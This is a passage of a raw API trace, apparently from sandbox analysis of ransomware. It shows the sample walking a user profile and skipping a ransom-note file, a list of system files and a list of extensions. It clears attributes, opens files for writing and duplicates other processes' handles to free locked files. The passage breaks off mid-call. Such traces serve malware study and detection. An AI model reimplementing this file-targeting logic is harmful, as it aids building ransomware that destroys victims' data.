(hObject=0x680) returned 1 [0152.409] CloseHandle (hObject=0x62c) returned 1 [0152.409] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8ec) returned 0x62c [0152.409] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x60, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.409] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.409] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.410] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.410] CloseHandle (hObject=0x670) returned 1 [0152.410] CloseHandle (hObject=0x680) returned 1 [0152.410] CloseHandle (hObject=0x62c) returned 1 [0152.410] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8ec) returned 0x62c [0152.410] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x154, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.410] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.411] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.411] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.411] CloseHandle (hObject=0x670) returned 1 [0152.411] _wcsicmp (_Str1="\\MPLog-07132009-221054.log", _Str2="\\ntuser.dat.LOG1") returned -1 [0152.411] CloseHandle (hObject=0x680) returned 1 [0152.412] CloseHandle (hObject=0x62c) returned 1 [0152.412] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8ec) returned 0x62c [0152.412] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x270, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.412] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.412] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.413] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.413] CloseHandle (hObject=0x670) returned 1 [0152.413] CloseHandle (hObject=0x680) returned 1 [0152.413] CloseHandle (hObject=0x62c) returned 1 [0152.413] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8ec) returned 0x62c [0152.413] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x390, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.413] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.414] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.415] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.415] CloseHandle (hObject=0x670) returned 1 [0152.415] _wcsicmp (_Str1="\\My", _Str2="\\ntuser.dat.LOG1") returned -1 [0152.415] CloseHandle (hObject=0x680) returned 1 [0152.415] CloseHandle (hObject=0x62c) returned 1 [0152.415] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8ec) returned 0x62c [0152.415] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x3f4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.415] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.416] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.417] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.417] CloseHandle (hObject=0x670) returned 1 [0152.417] _wcsicmp (_Str1="\\mpengine.dll", _Str2="\\ntuser.dat.LOG1") returned -1 [0152.417] CloseHandle (hObject=0x680) returned 1 [0152.417] CloseHandle (hObject=0x62c) returned 1 [0152.417] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x618) returned 0x62c [0152.417] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.417] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.418] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.418] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.418] CloseHandle (hObject=0x670) returned 1 [0152.418] _wcsicmp (_Str1="\\System32", _Str2="\\ntuser.dat.LOG1") returned 5 [0152.418] CloseHandle (hObject=0x680) returned 1 [0152.418] CloseHandle (hObject=0x62c) returned 1 [0152.418] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x618) returned 0x62c [0152.418] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xb4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.419] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.419] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.420] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.420] CloseHandle (hObject=0x670) returned 1 [0152.420] CloseHandle (hObject=0x680) returned 1 [0152.420] CloseHandle (hObject=0x62c) returned 1 [0152.420] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44d8128) returned 1 [0152.420] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44b0068) returned 1 [0152.420] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44a0060) returned 1 [0152.420] FindNextFileW (in: hFindFile=0x2db8700, lpFindFileData=0x3fef6c | out: lpFindFileData=0x3fef6c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28f60c40, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ntuser.dat.LOG2", cAlternateFileName="NTUSER~2.LOG")) returned 1 [0152.420] _wcsicmp (_Str1="ntuser.dat.LOG2", _Str2="README.c06622a1.TXT") returned -4 [0152.420] wcsstr (_Str="ntuser.dat.LOG2", _SubStr="README") returned 0x0 [0152.420] _wcsicmp (_Str1="autorun.inf", _Str2="ntuser.dat.LOG2") returned -13 [0152.420] wcslen (_String="autorun.inf") returned 0xb [0152.420] _wcsicmp (_Str1="boot.ini", _Str2="ntuser.dat.LOG2") returned -12 [0152.420] wcslen (_String="boot.ini") returned 0x8 [0152.420] _wcsicmp (_Str1="bootfont.bin", _Str2="ntuser.dat.LOG2") returned -12 [0152.420] wcslen (_String="bootfont.bin") returned 0xc [0152.420] _wcsicmp (_Str1="bootsect.bak", _Str2="ntuser.dat.LOG2") returned -12 [0152.420] wcslen (_String="bootsect.bak") returned 0xc [0152.420] _wcsicmp (_Str1="desktop.ini", _Str2="ntuser.dat.LOG2") returned -10 [0152.420] wcslen (_String="desktop.ini") returned 0xb [0152.420] _wcsicmp (_Str1="iconcache.db", _Str2="ntuser.dat.LOG2") returned -5 [0152.421] wcslen (_String="iconcache.db") returned 0xc [0152.421] _wcsicmp (_Str1="ntldr", _Str2="ntuser.dat.LOG2") returned -9 [0152.421] wcslen (_String="ntldr") returned 0x5 [0152.421] _wcsicmp (_Str1="ntuser.dat", _Str2="ntuser.dat.LOG2") returned -46 [0152.421] wcslen (_String="ntuser.dat") returned 0xa [0152.421] _wcsicmp (_Str1="ntuser.dat.log", _Str2="ntuser.dat.LOG2") returned -50 [0152.421] wcslen (_String="ntuser.dat.log") returned 0xe [0152.421] _wcsicmp (_Str1="ntuser.ini", _Str2="ntuser.dat.LOG2") returned 5 [0152.421] wcslen (_String="ntuser.ini") returned 0xa [0152.421] _wcsicmp (_Str1="thumbs.db", _Str2="ntuser.dat.LOG2") returned 6 [0152.421] wcslen (_String="thumbs.db") returned 0x9 [0152.421] _wcsicmp (_Str1="386", _Str2="LOG2") returned -57 [0152.421] wcslen (_String="386") returned 0x3 [0152.421] _wcsicmp (_Str1="adv", _Str2="LOG2") returned -11 [0152.421] wcslen (_String="adv") returned 0x3 [0152.421] _wcsicmp (_Str1="ani", _Str2="LOG2") returned -11 [0152.421] wcslen (_String="ani") returned 0x3 [0152.421] _wcsicmp (_Str1="bat", _Str2="LOG2") returned -10 [0152.421] wcslen (_String="bat") returned 0x3 [0152.421] _wcsicmp (_Str1="bin", _Str2="LOG2") returned -10 [0152.421] wcslen (_String="bin") returned 0x3 [0152.421] _wcsicmp (_Str1="cab", _Str2="LOG2") returned -9 [0152.421] wcslen (_String="cab") returned 0x3 [0152.421] _wcsicmp (_Str1="cmd", _Str2="LOG2") returned -9 [0152.421] wcslen (_String="cmd") returned 0x3 [0152.421] _wcsicmp (_Str1="com", _Str2="LOG2") returned -9 [0152.421] wcslen (_String="com") returned 0x3 [0152.421] _wcsicmp (_Str1="cpl", _Str2="LOG2") returned -9 [0152.421] wcslen (_String="cpl") returned 0x3 [0152.421] _wcsicmp (_Str1="cur", _Str2="LOG2") returned -9 [0152.421] wcslen (_String="cur") returned 0x3 [0152.421] _wcsicmp (_Str1="deskthemepack", _Str2="LOG2") returned -8 [0152.421] wcslen (_String="deskthemepack") returned 0xd [0152.421] _wcsicmp (_Str1="diagcab", _Str2="LOG2") returned -8 [0152.421] wcslen (_String="diagcab") returned 0x7 [0152.421] _wcsicmp (_Str1="diagcfg", _Str2="LOG2") returned -8 [0152.421] wcslen (_String="diagcfg") returned 0x7 [0152.422] _wcsicmp (_Str1="diagpkg", _Str2="LOG2") returned -8 [0152.422] wcslen (_String="diagpkg") returned 0x7 [0152.422] _wcsicmp (_Str1="dll", _Str2="LOG2") returned -8 [0152.422] wcslen (_String="dll") returned 0x3 [0152.422] _wcsicmp (_Str1="drv", _Str2="LOG2") returned -8 [0152.422] wcslen (_String="drv") returned 0x3 [0152.422] _wcsicmp (_Str1="exe", _Str2="LOG2") returned -7 [0152.422] wcslen (_String="exe") returned 0x3 [0152.422] _wcsicmp (_Str1="hlp", _Str2="LOG2") returned -4 [0152.422] wcslen (_String="hlp") returned 0x3 [0152.422] _wcsicmp (_Str1="icl", _Str2="LOG2") returned -3 [0152.422] wcslen (_String="icl") returned 0x3 [0152.422] _wcsicmp (_Str1="icns", _Str2="LOG2") returned -3 [0152.422] wcslen (_String="icns") returned 0x4 [0152.422] _wcsicmp (_Str1="ico", _Str2="LOG2") returned -3 [0152.422] wcslen (_String="ico") returned 0x3 [0152.422] _wcsicmp (_Str1="ics", _Str2="LOG2") returned -3 [0152.422] wcslen (_String="ics") returned 0x3 [0152.422] _wcsicmp (_Str1="idx", _Str2="LOG2") returned -3 [0152.422] wcslen (_String="idx") returned 0x3 [0152.422] _wcsicmp (_Str1="ldf", _Str2="LOG2") returned -11 [0152.422] wcslen (_String="ldf") returned 0x3 [0152.422] _wcsicmp (_Str1="lnk", _Str2="LOG2") returned -1 [0152.422] wcslen (_String="lnk") returned 0x3 [0152.422] _wcsicmp (_Str1="mod", _Str2="LOG2") returned 1 [0152.422] wcslen (_String="mod") returned 0x3 [0152.422] _wcsicmp (_Str1="mpa", _Str2="LOG2") returned 1 [0152.422] wcslen (_String="mpa") returned 0x3 [0152.422] _wcsicmp (_Str1="msc", _Str2="LOG2") returned 1 [0152.422] wcslen (_String="msc") returned 0x3 [0152.422] _wcsicmp (_Str1="msp", _Str2="LOG2") returned 1 [0152.422] wcslen (_String="msp") returned 0x3 [0152.422] _wcsicmp (_Str1="msstyles", _Str2="LOG2") returned 1 [0152.422] wcslen (_String="msstyles") returned 0x8 [0152.422] _wcsicmp (_Str1="msu", _Str2="LOG2") returned 1 [0152.422] wcslen (_String="msu") returned 0x3 [0152.422] _wcsicmp (_Str1="nls", _Str2="LOG2") returned 2 [0152.422] wcslen (_String="nls") returned 0x3 [0152.423] _wcsicmp (_Str1="nomedia", _Str2="LOG2") returned 2 [0152.423] wcslen (_String="nomedia") returned 0x7 [0152.423] _wcsicmp (_Str1="ocx", _Str2="LOG2") returned 3 [0152.423] wcslen (_String="ocx") returned 0x3 [0152.423] _wcsicmp (_Str1="prf", _Str2="LOG2") returned 4 [0152.423] wcslen (_String="prf") returned 0x3 [0152.423] _wcsicmp (_Str1="ps1", _Str2="LOG2") returned 4 [0152.423] wcslen (_String="ps1") returned 0x3 [0152.423] _wcsicmp (_Str1="rom", _Str2="LOG2") returned 6 [0152.423] wcslen (_String="rom") returned 0x3 [0152.423] _wcsicmp (_Str1="rtp", _Str2="LOG2") returned 6 [0152.423] wcslen (_String="rtp") returned 0x3 [0152.423] _wcsicmp (_Str1="scr", _Str2="LOG2") returned 7 [0152.423] wcslen (_String="scr") returned 0x3 [0152.423] _wcsicmp (_Str1="shs", _Str2="LOG2") returned 7 [0152.423] wcslen (_String="shs") returned 0x3 [0152.423] _wcsicmp (_Str1="spl", _Str2="LOG2") returned 7 [0152.423] wcslen (_String="spl") returned 0x3 [0152.423] _wcsicmp (_Str1="sys", _Str2="LOG2") returned 7 [0152.423] wcslen (_String="sys") returned 0x3 [0152.423] _wcsicmp (_Str1="theme", _Str2="LOG2") returned 8 [0152.423] wcslen (_String="theme") returned 0x5 [0152.423] _wcsicmp (_Str1="themepack", _Str2="LOG2") returned 8 [0152.423] wcslen (_String="themepack") returned 0x9 [0152.423] _wcsicmp (_Str1="wpx", _Str2="LOG2") returned 11 [0152.423] wcslen (_String="wpx") returned 0x3 [0152.423] _wcsicmp (_Str1="lock", _Str2="LOG2") returned -4 [0152.423] wcslen (_String="lock") returned 0x4 [0152.423] _wcsicmp (_Str1="key", _Str2="LOG2") returned -1 [0152.423] wcslen (_String="key") returned 0x3 [0152.423] _wcsicmp (_Str1="hta", _Str2="LOG2") returned -4 [0152.423] wcslen (_String="hta") returned 0x3 [0152.423] _wcsicmp (_Str1="msi", _Str2="LOG2") returned 1 [0152.423] wcslen (_String="msi") returned 0x3 [0152.423] _wcsicmp (_Str1="pdb", _Str2="LOG2") returned 4 [0152.423] wcslen (_String="pdb") returned 0x3 [0152.423] _wcsicmp (_Str1="sql", _Str2="LOG2") returned 7 [0152.423] wcslen (_String="sql") returned 0x3 [0152.424] _wcsicmp (_Str1="sqlite", _Str2="LOG2") returned 7 [0152.424] wcslen (_String="sqlite") returned 0x6 [0152.424] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz")) returned 0x10 [0152.424] FindNextFileW (in: hFindFile=0x2db8700, lpFindFileData=0x3fef6c | out: lpFindFileData=0x3fef6c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", cAlternateFileName="NTUSER~1.BLF")) returned 1 [0152.424] _wcsicmp (_Str1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", _Str2="README.c06622a1.TXT") returned -4 [0152.424] wcsstr (_Str="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", _SubStr="README") returned 0x0 [0152.424] _wcsicmp (_Str1="autorun.inf", _Str2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -13 [0152.424] wcslen (_String="autorun.inf") returned 0xb [0152.424] _wcsicmp (_Str1="boot.ini", _Str2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -12 [0152.424] wcslen (_String="boot.ini") returned 0x8 [0152.424] _wcsicmp (_Str1="bootfont.bin", _Str2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -12 [0152.424] wcslen (_String="bootfont.bin") returned 0xc [0152.424] _wcsicmp (_Str1="bootsect.bak", _Str2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -12 [0152.424] wcslen (_String="bootsect.bak") returned 0xc [0152.424] _wcsicmp (_Str1="desktop.ini", _Str2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -10 [0152.424] wcslen (_String="desktop.ini") returned 0xb [0152.424] _wcsicmp (_Str1="iconcache.db", _Str2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -5 [0152.424] wcslen (_String="iconcache.db") returned 0xc [0152.424] _wcsicmp (_Str1="ntldr", _Str2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -9 [0152.424] wcslen (_String="ntldr") returned 0x5 [0152.424] _wcsicmp (_Str1="ntuser.dat", _Str2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -123 [0152.424] wcslen (_String="ntuser.dat") returned 0xa [0152.424] _wcsicmp (_Str1="ntuser.dat.log", _Str2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -77 [0152.424] wcslen (_String="ntuser.dat.log") returned 0xe [0152.424] _wcsicmp (_Str1="ntuser.ini", _Str2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0152.424] wcslen (_String="ntuser.ini") returned 0xa [0152.424] _wcsicmp (_Str1="thumbs.db", _Str2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 6 [0152.424] wcslen (_String="thumbs.db") returned 0x9 [0152.424] _wcsicmp (_Str1="386", _Str2="blf") returned -47 [0152.424] wcslen (_String="386") returned 0x3 [0152.424] _wcsicmp (_Str1="adv", _Str2="blf") returned -1 [0152.424] wcslen (_String="adv") returned 0x3 [0152.425] _wcsicmp (_Str1="ani", _Str2="blf") returned -1 [0152.425] wcslen (_String="ani") returned 0x3 [0152.425] _wcsicmp (_Str1="bat", _Str2="blf") returned -11 [0152.425] wcslen (_String="bat") returned 0x3 [0152.425] _wcsicmp (_Str1="bin", _Str2="blf") returned -3 [0152.425] wcslen (_String="bin") returned 0x3 [0152.425] _wcsicmp (_Str1="cab", _Str2="blf") returned 1 [0152.425] wcslen (_String="cab") returned 0x3 [0152.425] _wcsicmp (_Str1="cmd", _Str2="blf") returned 1 [0152.425] wcslen (_String="cmd") returned 0x3 [0152.425] _wcsicmp (_Str1="com", _Str2="blf") returned 1 [0152.425] wcslen (_String="com") returned 0x3 [0152.425] _wcsicmp (_Str1="cpl", _Str2="blf") returned 1 [0152.425] wcslen (_String="cpl") returned 0x3 [0152.425] _wcsicmp (_Str1="cur", _Str2="blf") returned 1 [0152.425] wcslen (_String="cur") returned 0x3 [0152.425] _wcsicmp (_Str1="deskthemepack", _Str2="blf") returned 2 [0152.425] wcslen (_String="deskthemepack") returned 0xd [0152.425] _wcsicmp (_Str1="diagcab", _Str2="blf") returned 2 [0152.425] wcslen (_String="diagcab") returned 0x7 [0152.425] _wcsicmp (_Str1="diagcfg", _Str2="blf") returned 2 [0152.425] wcslen (_String="diagcfg") returned 0x7 [0152.425] _wcsicmp (_Str1="diagpkg", _Str2="blf") returned 2 [0152.425] wcslen (_String="diagpkg") returned 0x7 [0152.425] _wcsicmp (_Str1="dll", _Str2="blf") returned 2 [0152.425] wcslen (_String="dll") returned 0x3 [0152.425] _wcsicmp (_Str1="drv", _Str2="blf") returned 2 [0152.425] wcslen (_String="drv") returned 0x3 [0152.425] _wcsicmp (_Str1="exe", _Str2="blf") returned 3 [0152.425] wcslen (_String="exe") returned 0x3 [0152.425] _wcsicmp (_Str1="hlp", _Str2="blf") returned 6 [0152.425] wcslen (_String="hlp") returned 0x3 [0152.425] _wcsicmp (_Str1="icl", _Str2="blf") returned 7 [0152.425] wcslen (_String="icl") returned 0x3 [0152.425] _wcsicmp (_Str1="icns", _Str2="blf") returned 7 [0152.425] wcslen (_String="icns") returned 0x4 [0152.425] _wcsicmp (_Str1="ico", _Str2="blf") returned 7 [0152.425] wcslen (_String="ico") returned 0x3 [0152.425] _wcsicmp (_Str1="ics", _Str2="blf") returned 7 [0152.426] wcslen (_String="ics") returned 0x3 [0152.426] _wcsicmp (_Str1="idx", _Str2="blf") returned 7 [0152.426] wcslen (_String="idx") returned 0x3 [0152.426] _wcsicmp (_Str1="ldf", _Str2="blf") returned 10 [0152.426] wcslen (_String="ldf") returned 0x3 [0152.426] _wcsicmp (_Str1="lnk", _Str2="blf") returned 10 [0152.426] wcslen (_String="lnk") returned 0x3 [0152.426] _wcsicmp (_Str1="mod", _Str2="blf") returned 11 [0152.426] wcslen (_String="mod") returned 0x3 [0152.426] _wcsicmp (_Str1="mpa", _Str2="blf") returned 11 [0152.426] wcslen (_String="mpa") returned 0x3 [0152.426] _wcsicmp (_Str1="msc", _Str2="blf") returned 11 [0152.426] wcslen (_String="msc") returned 0x3 [0152.426] _wcsicmp (_Str1="msp", _Str2="blf") returned 11 [0152.426] wcslen (_String="msp") returned 0x3 [0152.426] _wcsicmp (_Str1="msstyles", _Str2="blf") returned 11 [0152.426] wcslen (_String="msstyles") returned 0x8 [0152.426] _wcsicmp (_Str1="msu", _Str2="blf") returned 11 [0152.426] wcslen (_String="msu") returned 0x3 [0152.426] _wcsicmp (_Str1="nls", _Str2="blf") returned 12 [0152.426] wcslen (_String="nls") returned 0x3 [0152.426] _wcsicmp (_Str1="nomedia", _Str2="blf") returned 12 [0152.426] wcslen (_String="nomedia") returned 0x7 [0152.426] _wcsicmp (_Str1="ocx", _Str2="blf") returned 13 [0152.427] wcslen (_String="ocx") returned 0x3 [0152.427] _wcsicmp (_Str1="prf", _Str2="blf") returned 14 [0152.427] wcslen (_String="prf") returned 0x3 [0152.427] _wcsicmp (_Str1="ps1", _Str2="blf") returned 14 [0152.427] wcslen (_String="ps1") returned 0x3 [0152.427] _wcsicmp (_Str1="rom", _Str2="blf") returned 16 [0152.427] wcslen (_String="rom") returned 0x3 [0152.427] _wcsicmp (_Str1="rtp", _Str2="blf") returned 16 [0152.427] wcslen (_String="rtp") returned 0x3 [0152.427] _wcsicmp (_Str1="scr", _Str2="blf") returned 17 [0152.427] wcslen (_String="scr") returned 0x3 [0152.427] _wcsicmp (_Str1="shs", _Str2="blf") returned 17 [0152.427] wcslen (_String="shs") returned 0x3 [0152.427] _wcsicmp (_Str1="spl", _Str2="blf") returned 17 [0152.427] wcslen (_String="spl") returned 0x3 [0152.427] _wcsicmp (_Str1="sys", _Str2="blf") returned 17 [0152.427] wcslen (_String="sys") returned 0x3 [0152.427] _wcsicmp (_Str1="theme", _Str2="blf") returned 18 [0152.427] wcslen (_String="theme") returned 0x5 [0152.427] _wcsicmp (_Str1="themepack", _Str2="blf") returned 18 [0152.427] wcslen (_String="themepack") returned 0x9 [0152.427] _wcsicmp (_Str1="wpx", _Str2="blf") returned 21 [0152.427] wcslen (_String="wpx") returned 0x3 [0152.427] _wcsicmp (_Str1="lock", _Str2="blf") returned 10 [0152.427] wcslen (_String="lock") returned 0x4 [0152.427] _wcsicmp (_Str1="key", _Str2="blf") returned 9 [0152.427] wcslen (_String="key") returned 0x3 [0152.427] _wcsicmp (_Str1="hta", _Str2="blf") returned 6 [0152.427] wcslen (_String="hta") returned 0x3 [0152.427] _wcsicmp (_Str1="msi", _Str2="blf") returned 11 [0152.427] wcslen (_String="msi") returned 0x3 [0152.427] _wcsicmp (_Str1="pdb", _Str2="blf") returned 14 [0152.427] wcslen (_String="pdb") returned 0x3 [0152.427] _wcsicmp (_Str1="sql", _Str2="blf") returned 17 [0152.427] wcslen (_String="sql") returned 0x3 [0152.427] _wcsicmp (_Str1="sqlite", _Str2="blf") returned 17 [0152.428] wcslen (_String="sqlite") returned 0x6 [0152.428] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz")) returned 0x10 [0152.428] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44a0060 [0152.428] wcscpy (in: _Dest=0x44a0060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz" [0152.428] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x21 [0152.428] wcscpy (in: _Dest=0x44a00a4, _Source="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" | out: _Dest="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" [0152.428] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", dwFileAttributes=0x80) returned 1 [0152.428] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0152.428] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x62c [0152.428] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x400) returned 0x4e4170 [0152.428] NtQuerySystemInformation (in: SystemInformationClass=0x10, SystemInformation=0x4e4170, Length=0x400, ResultLength=0x3fed80 | out: SystemInformation=0x4e4170, ResultLength=0x3fed80*=0x28034) returned 0xc0000004 [0152.429] RtlReAllocateHeap (Heap=0x4c0000, Flags=0x0, Ptr=0x4e4170, Size=0x28034) returned 0x44b0068 [0152.429] NtQuerySystemInformation (in: SystemInformationClass=0x10, SystemInformation=0x44b0068, Length=0x28034, ResultLength=0x3fed80 | out: SystemInformation=0x44b0068, ResultLength=0x3fed80*=0x28034) returned 0x0 [0152.432] GetCurrentProcessId () returned 0x6fc [0152.432] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44b0068) returned 1 [0152.432] CloseHandle (hObject=0x62c) returned 1 [0152.432] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x400) returned 0x4e4170 [0152.432] NtQuerySystemInformation (in: SystemInformationClass=0x10, SystemInformation=0x4e4170, Length=0x400, ResultLength=0x3fedc0 | 